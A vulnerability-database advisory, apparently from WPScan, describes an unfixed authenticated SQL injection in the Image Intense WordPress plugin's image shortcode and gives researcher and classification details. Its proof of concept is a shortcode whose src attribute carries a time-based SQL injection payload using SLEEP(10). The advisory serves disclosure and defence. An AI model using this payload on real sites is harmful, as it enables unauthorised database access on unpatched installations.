Image Intense <= 3.2.5 - Authenticated SQL Injection in shortcodes



Description
The vendor does not consider it to be a vulnerability, it remains unfixed.

SQL Injection in handling of the "et_pb_image_n10s" shortcode.

The last version at the time of the original advisory, 3.2.5, is known to be affected.
Proof of Concept
[et_pb_section bb_built="1"][et_pb_row][et_pb_column type="4_4"][et_pb_image_n10s 
_builder_version="3.0.82" src="
test' OR SLEEP(10) -- 
" size="azaz" 
/][/et_pb_column][/et_pb_row][/et_pb_section]

Affects Plugin

References

URL https://synacktiv.com/ressources/advisories/Image-Intense-3.2.5-SQL_Injection.pdf
URL https://besuperfly.com/product/image-intense-plugin/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Thomas Chauchefoin / Julien Legras
Submitter Thomas Chauchefoin / Julien Legras
Submitter Website https://synacktiv.com
Views 2961
Verified No
WPVDB ID 9122

Timeline

Publicly Published 2018-09-05 (2 months ago)
Added 2018-09-05 (2 months ago)
Last Updated 2018-09-14 (2 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.